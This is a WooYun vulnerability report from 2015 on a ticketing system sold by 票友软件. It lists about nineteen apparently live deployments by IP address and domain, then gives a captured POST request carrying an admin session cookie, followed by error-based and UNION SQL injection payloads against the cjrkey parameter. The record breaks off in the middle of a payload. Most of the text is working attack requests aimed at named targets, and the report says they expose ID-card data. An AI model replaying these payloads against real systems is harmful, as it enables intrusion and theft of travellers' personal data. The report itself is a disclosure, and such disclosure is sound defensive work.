漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0120643
漏洞标题:第三方某售票系统通用型SQL注入+越权查看身份证等信息#2(无须登录)
相关厂商:票友软件
漏洞作者: 路人甲
提交时间:2015-06-17 10:15
修复时间:2015-09-20 09:22
公开时间:2015-09-20 09:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-22: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向第三方安全合作伙伴开放
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开
简要描述:
rt
详细说明:
demo.piaoyou.org/
ttp://221.224.50.46/
http://jy.4000211929.com/
http://61.129.251.198:81/
http://demo.piaoyou.org/
oa.wuzhouair.com
http://61.129.251.198:88/
http://58.246.26.230:81/
http://122.227.255.94:81/
http://180.166.101.94:81/
http://222.128.120.192:81/
oa.yccas.com
http://oa.zhongbo-china.com/
http://oa.jl-travel.com/
http://oa.dxtravel.cn
http://cz.4000211929.com
http://hy.4000211929.com/
wh.4000211929.com/
www.yeehang.cc/
官网demo为例:
firefox禁用js:
漏洞证明:
抓包:
POST http://demo.piaoyou.org/Welcome.aspx HTTP/1.1
Host: demo.piaoyou.org
Connection: keep-alive
Content-Length: 6721
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://demo.piaoyou.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.piaoyou.org/Welcome.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=fkry0rvyd1ghhruvex4aoxaf; pycookie=loginname=admin&truename=%e7%b3%bb%e7%bb%9f%e7%ae%a1%e7%90%86%e5%91%98&flag=1&datagroup=admin%7cWeb%7cxiaofeng%7ctest%7cfengxiao%7cwangxiaoming%7cqq%7c%e4%b8%8a%e6%b5%b7%e5%b0%8f%e5%b0%81%7c&kefugroup=%e7%bd%91%e7%bb%9c%e9%83%a8&kpgroup=0&kpdian=
__VIEWSTATE=%2FwEPDwULLTEwMzkyOTQ3MDcPZBYCAgMPZBYaAgEPFgIeBXN0eWxlBQ5kaXNwbGF5OmJsb2NrO2QCDw9kFgJmDzwrABECAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkARAWABYAFgBkAhYPPCsAEQIADxYEHwFnHwICCmQBEBYAFgAWABYCZg9kFhYCAQ8PZBYEHgJpZAUBMR4Hb25jbGljawUTc2VsX2x4aW5mbyh0aGlzLDEpOxYQZg8PFgIeBFRleHQFATFkZAIBDw8WAh8FBQbkuJzoiKpkZAICDw8WAh8FBQU5NTgwOGRkAgMPDxYCHwUFBiZuYnNwO2RkAgQPDxYCHwUFFndlYl9zZXJ2aWNlQGNlLWFpci5jb21kZAIFDw8WAh8FBRVodHRwOi8vd3d3LmNlLWFpci5jb21kZAIGDw8WAh8FBQZQVkc6VDFkZAIHDw8WAh8FBQVhZG1pbmRkAgIPD2QWBB8DBQEyHwQFE3NlbF9seGluZm8odGhpcywyKTsWEGYPDxYCHwUFATJkZAIBDw8WAh8FBQblm73oiKpkZAICDw8WAh8FBQw0MDA4IDEwMCA5OTlkZAIDDw8WAh8FBQYmbmJzcDtkZAIEDw8WAh8FBRhmZnBAbWFpbC5haXJjaGluYS5jb20uY25kZAIFDw8WAh8FBRpodHRwOi8vd3d3LmFpcmNoaW5hLmNvbS5jbmRkAgYPDxYCHwUFBlBWRzpUMmRkAgcPDxYCHwUFBWFkbWluZGQCAw8PZBYEHwMFATMfBAUTc2VsX2x4aW5mbyh0aGlzLDMpOxYQZg8PFgIfBQUBM2RkAgEPDxYCHwUFBuWNl%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%2FlsIEVCAAFYWRtaW4IeGlhb2ZlbmcEdGVzdAhmZW5neGlhbwx3YW5neGlhb21pbmcCcXEM5LiK5rW35bCP5bCBFCsDCGdnZ2dnZ2dnZGQCMA8WAh8CAgEWAgIBD2QWAmYPFRQDOTM4BiZuYnNwOwnojIPmmZPlhbALMTM1MjIwMDQ0OTkGSkQ1RTc3F%2BWMl%2BS6rChUM%2BiIquermealvCktWUNVBkNBMTIzNwFZCjYtMTYgMTE6NDUGMTM6NDAvDjc4MS02Njc3Nzc3Nzc3BFQzLS0EMTAwJQRub25lGOS4reWbveWbvemZheiIquepuuWFrOWPuAM4MzACNTADODgwAzkzOAM0MzFkAjIPEA8WBh8HBQdzdWJqZWN0HwgFBnJlbWFyax8BZ2QQFQMUPemAieaLqeefreS%2Foeaooeadvz0V6Iiq54%2Bt5o%2BQ6YaS5qih5p2%2F5LiACHhpYW9mZW5nFQMAYuWwiuaVrOeahHtja33vvJrmgqjpooTorqLnmoR7Y2hhaGN977yM6Iiq54%2Bte2hife%2B8jHtxZmRhdGV96LW36aOe77yMe2VuZHRpbWV95Yiw6L6%2B77yM5bey5Ye656Wo44CCkALml4XlrqJ7Y2t9LOS4reaWh%2BiIqueoi%2B%2B8mntjaGFoY33oiKrnj63vvJp7aGJ9LOi1t%2BmjnuaXtumXtO%2B8mntxZmRhdGV9LOWIsOi%2BvuaXtumXtO%2B8mntlbmR0aW1lfe%2B8jOiusOW9lee8luWPt%2B%2B8mntQTlJ977yM6Iix5L2N77yae3prfeaKmOaJo%2B%2B8mntjd2tvdX3npajlj7fvvJp7cG51bX3vvIznpajku7fvvJp7cHJpY2V977yM56iO5qy%2B77yae3NodWl96K6i5Y2V6YeR6aKd77yae2R0b3RhbH3vvIzor4Hku7blj7fnoIHvvJp7Zm9pZH3vvIzoiKrnqbrlhazlj7jvvJp7YWlyfRQrAwNnZ2dkZAI0DxYCHwJmZAI2DxAPFgYfBwUHc3ViamVjdB8IBQZyZW1hcmsfAWdkEBUBFD3pgInmi6nnn63kv6HmqKHmnb89FQEAFCsDAWdkZAI4Dw8WAh8FBRXku4rlpKnnlJ%2Fml6XnmoTml4XlrqJkZAI8DzwrABECAA8WBB8BZx8CAgVkARAWABYAFgAWAmYPZBYMAgEPZBYIZg9kFgICAQ8PFgIeC05hdmlnYXRlVXJsBRwvaW5mby96Y2xpc3Rfdmlldy5hc3B4P2lkPTQ1FgIfBAUNaGlkZV9uZXdzKDIpOxYCZg8VAQM1NTVkAgEPZBYCAgEPDxYCHgdFbmFibGVkaGQWAmYPFQEAZAICDw8WAh8FBQgyMDE1LTYtOWRkAgMPZBYCAgEPDxYCHwZoZGQCAg9kFghmD2QWAgIBDw8WAh8JBRwvaW5mby96Y2xpc3Rfdmlldy5hc3B4P2lkPTQxFgIfBAUNaGlkZV9uZXdzKDMpOxYCZg8VAQzmtYvor5XmoIfpophkAgEPZBYCAgEPDxYCHwpoZBYCZg8VAQBkAgIPDxYCHwUFCDIwMTUtNi04ZGQCAw9kFgICAQ8PFgIfBmhkZAIDD2QWCGYPZBYCAgEPDxYCHwkFHC9pbmZvL3pjbGlzdF92aWV3LmFzcHg%2FaWQ9MjkWAh8EBQ1oaWRlX25ld3MoNCk7FgJmDxUBD%2BWFrOWRiuS%2FoeaBr%2BS4gGQCAQ9kFgICAQ8PFgIfCmhkFgJmDxUBAGQCAg8PFgIfBQUJMjAxNS00LTI0ZGQCAw9kFgICAQ8PFgIfBmhkZAIED2QWCGYPZBYCAgEPDxYCHwkFHC9pbmZvL3pjbGlzdF92aWV3LmFzcHg%2FaWQ9MzEWAh8EBQ1oaWRlX25ld3MoNSk7FgJmDxUBD%2BWFrOWRiuS%2FoeaBr%2BS4iWQCAQ9kFgICAQ8PFgIfCmhkFgJmDxUBAGQCAg8PFgIfBQUJMjAxMy04LTE5ZGQCAw9kFgICAQ8PFgIfBmhkZAIFD2QWCGYPZBYCAgEPDxYCHwkFHC9pbmZvL3pjbGlzdF92aWV3LmFzcHg%2FaWQ9MzAWAh8EBQ1oaWRlX25ld3MoNik7FgJmDxUBD%2BWFrOWRiuS%2FoeaBr%2BS6jGQCAQ9kFgICAQ8PFgIfCmhkFgJmDxUBAGQCAg8PFgIfBQUJMjAxMy04LTE5ZGQCAw9kFgICAQ8PFgIfBmhkZAIGDw8WAh8GaGRkAlIPD2QPEBYBZhYBFgIeDlBhcmFtZXRlclZhbHVlZBYBAgNkZAJUDw9kDxAWAWYWARYEHgxEZWZhdWx0VmFsdWUFBWFkbWluHwtkFgECA2RkGAQFAnpjDzwrAAwBCAIBZAUJR3JpZFZpZXczDzwrAAwBCGZkBQlHcmlkVmlldzIPPCsADAEIAgFkBQlHcmlkVmlldzEPPCsADAEIZmR8j4Cv8Gqpw9nGG45zzpJJrS0bq%2F5CppzGXCwzuo7enQ%3D%3D&__EVENTVALIDATION=%2FwEWPgL4oLG6DQKP2NOjDAKQ2NOjDAKft%2FlNAuikz5UDApi4iOoEAoznisYGArursYYIApzEg7wPAoXZ9dsDApGU9SQCrcaEtQIClYq34AMCuo%2FQxA4CgYvYlw4ClI2NyAECj6H92wkC5tOOxAgChOWGmAQCh%2BWGmAQCluWGmAQCmeWGmAQCgeXGmwQCgeXKmwQCgeXOmwQCgeXymwQCgeX2mwQCgeX6mwQCgeX%2BmwQCgeXimwQCgeWmmAQCgeWqmAQCgOXGmwQCgOXKmwQCgOXOmwQCgOXymwQCgOX2mwQCpuTkuwcC4s3XnAMCy626qA0C0fjq7AkCg%2FXxpggCmYrurQkC6YuC1AsC06HBqQcCutuV1AQC8%2BsEAsuR9c8MAvjTm%2BQLAo3S39oNAsih8ecFAqDCk%2FENAtLNlZ0JAuekk8gEAuiX56oEAsiDhOgJAoLey%2BEPAvHrsI8HAuzVi9wEAobfk9cFAsCV1cAIAtaUz5sC9U5aJB3VbcQ1pX%2BDk5s%2FxscEkJ4WmW6r9DIW5K08LSo%3D&ckfs_sel=0&cjrkey=aaa&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
lx_key,cjrkey等多处注入
Parameter: cjrkey (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTEwMzkyOTQ3MDcPZBYCAgMPZBYaAgEPFgIeBXN0eWxlBQ5kaXNwbGF5OmJsb2NrO2QCDw9kFgJmDzwrABECAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkARAWABYAFgBkAhYPPCsAEQIADxYEHwFnHwICCmQBEBYAFgAWABYCZg9kFhYCAQ8PZBYEHgJpZAUBMR4Hb25jbGljawUTc2VsX2x4aW5mbyh0aGlzLDEpOxYQZg8PFgIeBFRleHQFATFkZAIBDw8WAh8FBQbkuJzoiKpkZAICDw8WAh8FBQU5NTgwOGRkAgMPDxYCHwUFBiZuYnNwO2RkAgQPDxYCHwUFFndlYl9zZXJ2aWNlQGNlLWFpci5jb21kZAIFDw8WAh8FBRVodHRwOi8vd3d3LmNlLWFpci5jb21kZAIGDw8WAh8FBQZQVkc6VDFkZAIHDw8WAh8FBQVhZG1pbmRkAgIPD2QWBB8DBQEyHwQFE3NlbF9seGluZm8odGhpcywyKTsWEGYPDxYCHwUFATJkZAIBDw8WAh8FBQblm73oiKpkZAICDw8WAh8FBQw0MDA4IDEwMCA5OTlkZAIDDw8WAh8FBQYmbmJzcDtkZAIEDw8WAh8FBRhmZnBAbWFpbC5haXJjaGluYS5jb20uY25kZAIFDw8WAh8FBRpodHRwOi8vd3d3LmFpcmNoaW5hLmNvbS5jbmRkAgYPDxYCHwUFBlBWRzpUMmRkAgcPDxYCHwUFBWFkbWluZGQCAw8PZBYEHwMFATMfBAUTc2VsX2x4aW5mbyh0aGlzLDMpOxYQZg8PFgIfBQUBM2RkAgEPDxYCHwUFBuWNl+iIqmRkAgIPDxYCHwUFBTk1NTM5ZGQCAw8PFgIfBQUGJm5ic3A7ZGQCBA8PFgIfBQUTd2VibWFzdGVyQGNzYWlyLmNvbWRkAgUPDxYCHwUFFGh0dHA6Ly93d3cuY3NhaXIuY29tZGQCBg8PFgIfBQUGJm5ic3A7ZGQCBw8PFgIfBQUFYWRtaW5kZAIEDw9kFgQfAwUBNB8EBRNzZWxfbHhpbmZvKHRoaXMsNCk7FhBmDw8WAh8FBQE0ZGQCAQ8PFgIfBQUG5Y6m6IiqZGQCAg8PFgIfBQUHOTU1NTcNCmRkAgMPDxYCHwUFBiZuYnNwO2RkAgQPDxYCHwUFFWluZm9AeGlhbWVuYWlyLmNvbS5jbmRkAgUPDxYCHwUFG2h0dHA6Ly93d3cueGlhbWVuYWlyLmNvbS5jbmRkAgYPDxYCHwUFBiZuYnNwO2RkAgcPDxYCHwUFBWFkbWluZGQCBQ8PZBYEHwMFATUfBAUTc2VsX2x4aW5mbyh0aGlzLDUpOxYQZg8PFgIfBQUBNWRkAgEPDxYCHwUFBua3seiIqmRkAgIPDxYCHwUFBTk1MDgwZGQCAw8PFgIfBQUGJm5ic3A7ZGQCBA8PFgIfBQUSd21Ac2hlbnpoZW5haXIuY29tZGQCBQ8PFgIfBQUaaHR0cDovL3d3dy5zaGVuemhlbmFpci5jb21kZAIGDw8WAh8FBQYmbmJzcDtkZAIHDw8WAh8FBQVhZG1pbmRkAgYPD2QWBB8DBQE2HwQFE3NlbF9seGluZm8odGhpcyw2KTsWEGYPDxYCHwUFATZkZAIBDw8WAh8FBQbmtbfoiKpkZAICDw8WAh8FBQY5NTA3MThkZAIDDw8WAh8FBQYmbmJzcDtkZAIEDw8WAh8FBQYmbmJzcDtkZAIFDw8WAh8FBRRodHRwOi8vd3d3LmhuYWlyLmNvbWRkAgYPDxYCHwUFBiZuYnNwO2RkAgcPDxYCHwUFBWFkbWluZGQCBw8PZBYEHwMFATcfBAUTc2VsX2x4aW5mbyh0aGlzLDcpOxYQZg8PFgIfBQUBN2RkAgEPDxYCHwUFBuWxseiIqmRkAgIPDxYCHwUFDDQwMC02MC05Njc3N2RkAgMPDxYCHwUFBiZuYnNwO2RkAgQPDxYCHwUFBiZuYnNwO2RkAgUPDxYCHwUFHWh0dHA6Ly93d3cuc2hhbmRvbmdhaXIuY29tLmNuZGQCBg8PFgIfBQUGJm5ic3A7ZGQCBw8PFgIfBQUFYWRtaW5kZAIIDw9kFgQfAwUBOB8EBRNzZWxfbHhpbmZvKHRoaXMsOCk7FhBmDw8WAh8FBQE4ZGQCAQ8PFgIfBQUG5bed6IiqZGQCAg8PFgIfBQUMNDAwLTgzMC0wOTk5ZGQCAw8PFgIfBQUGJm5ic3A7ZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBQ8PFgIfBQUWaHR0cDovL3d3dy5zY2FsLmNvbS5jbmRkAgYPDxYCHwUFBiZuYnNwO2RkAgcPDxYCHwUFBWFkbWluZGQCCQ8PZBYEHwMFATkfBAUTc2VsX2x4aW5mbyh0aGlzLDkpOxYQZg8PFgIfBQUBOWRkAgEPDxYCHwUFDOWQieelpeiIquepumRkAgIPDxYCHwUFBTk1NTIwZGQCAw8PFgIfBQUGJm5ic3A7ZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBQ8PFgIfBQUeaHR0cDovL3d3dy5qdW5leWFvYWlybGluZXMuY29tZGQCBg8PFgIfBQUGJm5ic3A7ZGQCBw8PFgIfBQUFYWRtaW5kZAIKDw9kFgQfAwUCMjAfBAUUc2VsX2x4aW5mbyh0aGlzLDIwKTsWEGYPDxYCHwUFAjIwZGQCAQ8PFgIfBQUD546LZGQCAg8PFgIfBQUFOTU4MDhkZAIDDw8WAh8FBQc1MzU0MzU1ZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBQ8PFgIfBQUVaHR0cDovL3d3dy5jZS1haXIuY29tZGQCBg8PFgIfBQUGUFZHOlQxZGQCBw8PFgIfBQUFYWRtaW5kZAILDw8WAh4HVmlzaWJsZWhkZAIkDzwrABECAA8WBB8BZx8CZmQBEBYAFgAWAGQCKg8QDxYGHg1EYXRhVGV4dEZpZWxkBQh1c2VybmFtZR4ORGF0YVZhbHVlRmllbGQFCHVzZXJuYW1lHwFnZBAVCAs95omA5pyJ5Lq6PQVhZG1pbgh4aWFvZmVuZwR0ZXN0CGZlbmd4aWFvDHdhbmd4aWFvbWluZwJxcQzkuIrmtbflsI/lsIEVCAAFYWRtaW4IeGlhb2ZlbmcEdGVzdAhmZW5neGlhbwx3YW5neGlhb21pbmcCcXEM5LiK5rW35bCP5bCBFCsDCGdnZ2dnZ2dnZGQCMA8WAh8CAgEWAgIBD2QWAmYPFRQDOTM4BiZuYnNwOwnojIPmmZPlhbALMTM1MjIwMDQ0OTkGSkQ1RTc3F+WMl+S6rChUM+iIquermealvCktWUNVBkNBMTIzNwFZCjYtMTYgMTE6NDUGMTM6NDAvDjc4MS02Njc3Nzc3Nzc3BFQzLS0EMTAwJQRub25lGOS4reWbveWbvemZheiIquepuuWFrOWPuAM4MzACNTADODgwAzkzOAM0MzFkAjIPEA8WBh8HBQdzdWJqZWN0HwgFBnJlbWFyax8BZ2QQFQMUPemAieaLqeefreS/oeaooeadvz0V6Iiq54+t5o+Q6YaS5qih5p2/5LiACHhpYW9mZW5nFQMAYuWwiuaVrOeahHtja33vvJrmgqjpooTorqLnmoR7Y2hhaGN977yM6Iiq54+te2hife+8jHtxZmRhdGV96LW36aOe77yMe2VuZHRpbWV95Yiw6L6+77yM5bey5Ye656Wo44CCkALml4XlrqJ7Y2t9LOS4reaWh+iIqueoi++8mntjaGFoY33oiKrnj63vvJp7aGJ9LOi1t+mjnuaXtumXtO+8mntxZmRhdGV9LOWIsOi+vuaXtumXtO+8mntlbmR0aW1lfe+8jOiusOW9lee8luWPt++8mntQTlJ977yM6Iix5L2N77yae3prfeaKmOaJo++8mntjd2tvdX3npajlj7fvvJp7cG51bX3vvIznpajku7fvvJp7cHJpY2V977yM56iO5qy+77yae3NodWl96K6i5Y2V6YeR6aKd77yae2R0b3RhbH3vvIzor4Hku7blj7fnoIHvvJp7Zm9pZH3vvIzoiKrnqbrlhazlj7jvvJp7YWlyfRQrAwNnZ2dkZAI0DxYCHwJmZAI2DxAPFgYfBwUHc3ViamVjdB8IBQZyZW1hcmsfAWdkEBUBFD3pgInmi6nnn63kv6HmqKHmnb89FQEAFCsDAWdkZAI4Dw8WAh8FBRXku4rlpKnnlJ/ml6XnmoTml4XlrqJkZAI8DzwrABECAA8WBB8BZx8CAgVkARAWABYAFgAWAmYPZBYMAgEPZBYIZg9kFgICAQ8PFgIeC05hdmlnYXRlVXJsBRwvaW5mby96Y2xpc3Rfdmlldy5hc3B4P2lkPTQ1FgIfBAUNaGlkZV9uZXdzKDIpOxYCZg8VAQM1NTVkAgEPZBYCAgEPDxYCHgdFbmFibGVkaGQWAmYPFQEAZAICDw8WAh8FBQgyMDE1LTYtOWRkAgMPZBYCAgEPDxYCHwZoZGQCAg9kFghmD2QWAgIBDw8WAh8JBRwvaW5mby96Y2xpc3Rfdmlldy5hc3B4P2lkPTQxFgIfBAUNaGlkZV9uZXdzKDMpOxYCZg8VAQzmtYvor5XmoIfpophkAgEPZBYCAgEPDxYCHwpoZBYCZg8VAQBkAgIPDxYCHwUFCDIwMTUtNi04ZGQCAw9kFgICAQ8PFgIfBmhkZAIDD2QWCGYPZBYCAgEPDxYCHwkFHC9pbmZvL3pjbGlzdF92aWV3LmFzcHg/aWQ9MjkWAh8EBQ1oaWRlX25ld3MoNCk7FgJmDxUBD+WFrOWRiuS/oeaBr+S4gGQCAQ9kFgICAQ8PFgIfCmhkFgJmDxUBAGQCAg8PFgIfBQUJMjAxNS00LTI0ZGQCAw9kFgICAQ8PFgIfBmhkZAIED2QWCGYPZBYCAgEPDxYCHwkFHC9pbmZvL3pjbGlzdF92aWV3LmFzcHg/aWQ9MzEWAh8EBQ1oaWRlX25ld3MoNSk7FgJmDxUBD+WFrOWRiuS/oeaBr+S4iWQCAQ9kFgICAQ8PFgIfCmhkFgJmDxUBAGQCAg8PFgIfBQUJMjAxMy04LTE5ZGQCAw9kFgICAQ8PFgIfBmhkZAIFD2QWCGYPZBYCAgEPDxYCHwkFHC9pbmZvL3pjbGlzdF92aWV3LmFzcHg/aWQ9MzAWAh8EBQ1oaWRlX25ld3MoNik7FgJmDxUBD+WFrOWRiuS/oeaBr+S6jGQCAQ9kFgICAQ8PFgIfCmhkFgJmDxUBAGQCAg8PFgIfBQUJMjAxMy04LTE5ZGQCAw9kFgICAQ8PFgIfBmhkZAIGDw8WAh8GaGRkAlIPD2QPEBYBZhYBFgIeDlBhcmFtZXRlclZhbHVlZBYBAgNkZAJUDw9kDxAWAWYWARYEHgxEZWZhdWx0VmFsdWUFBWFkbWluHwtkFgECA2RkGAQFAnpjDzwrAAwBCAIBZAUJR3JpZFZpZXczDzwrAAwBCGZkBQlHcmlkVmlldzIPPCsADAEIAgFkBQlHcmlkVmlldzEPPCsADAEIZmR8j4Cv8Gqpw9nGG45zzpJJrS0bq/5CppzGXCwzuo7enQ==&__EVENTVALIDATION=/wEWPgL4oLG6DQKP2NOjDAKQ2NOjDAKft/lNAuikz5UDApi4iOoEAoznisYGArursYYIApzEg7wPAoXZ9dsDApGU9SQCrcaEtQIClYq34AMCuo/QxA4CgYvYlw4ClI2NyAECj6H92wkC5tOOxAgChOWGmAQCh+WGmAQCluWGmAQCmeWGmAQCgeXGmwQCgeXKmwQCgeXOmwQCgeXymwQCgeX2mwQCgeX6mwQCgeX+mwQCgeXimwQCgeWmmAQCgeWqmAQCgOXGmwQCgOXKmwQCgOXOmwQCgOXymwQCgOX2mwQCpuTkuwcC4s3XnAMCy626qA0C0fjq7AkCg/XxpggCmYrurQkC6YuC1AsC06HBqQcCutuV1AQC8+sEAsuR9c8MAvjTm+QLAo3S39oNAsih8ecFAqDCk/ENAtLNlZ0JAuekk8gEAuiX56oEAsiDhOgJAoLey+EPAvHrsI8HAuzVi9wEAobfk9cFAsCV1cAIAtaUz5sC9U5aJB3VbcQ1pX+Dk5s/xscEkJ4WmW6r9DIW5K08LSo=&ckfs_sel=0&cjrkey=aaa%' AND 8229=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8229=8229) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(107)+CHAR(113))) AND '%'='&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: __VIEWSTATE=/wEPDwULLTEwMzkyOTQ3MDcPZBYCAgMPZBYaAgEPFgIeBXN0eWxlBQ5kaXNwbGF5OmJsb2NrO2QCDw9kFgJmDzwrABECAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkARAWABYAFgBkAhYPPCsAEQIADxYEHwFnHwICCmQBEBYAFgAWABYCZg9kFhYCAQ8PZBYEHgJpZAUBMR4Hb25jbGljawUTc2VsX2x4aW5mbyh0aGlzLDEpOxYQZg8PFgIeBFRleHQFATFkZAIBDw8WAh8FBQbkuJzoiKpkZAICDw8WAh8FBQU5NTgwOGRkAgMPDxYCHwUFBiZuYnNwO2RkAgQPDxYCHwUFFndlYl9zZXJ2aWNlQGNlLWFpci5jb21kZAIFDw8WAh8FBRVodHRwOi8vd3d3LmNlLWFpci5jb21kZAIGDw8WAh8FBQZQVkc6VDFkZAIHDw8WAh8FBQVhZG1pbmRkAgIPD2QWBB8DBQEyHwQFE3NlbF9seGluZm8odGhpcywyKTsWEGYPDxYCHwUFATJkZAIBDw8WAh8FBQblm73oiKpkZAICDw8WAh8FBQw0MDA4IDEwMCA5OTlkZAIDDw8WAh8FBQYmbmJzcDtkZAIEDw8WAh8FBRhmZnBAbWFpbC5haXJjaGluYS5jb20uY25kZAIFDw8WAh8FBRpodHRwOi8vd3d3LmFpcmNoaW5hLmNvbS5jbmRkAgYPDxYCHwUFBlBWRzpUMmRkAgcPDxYCHwUFBWFkb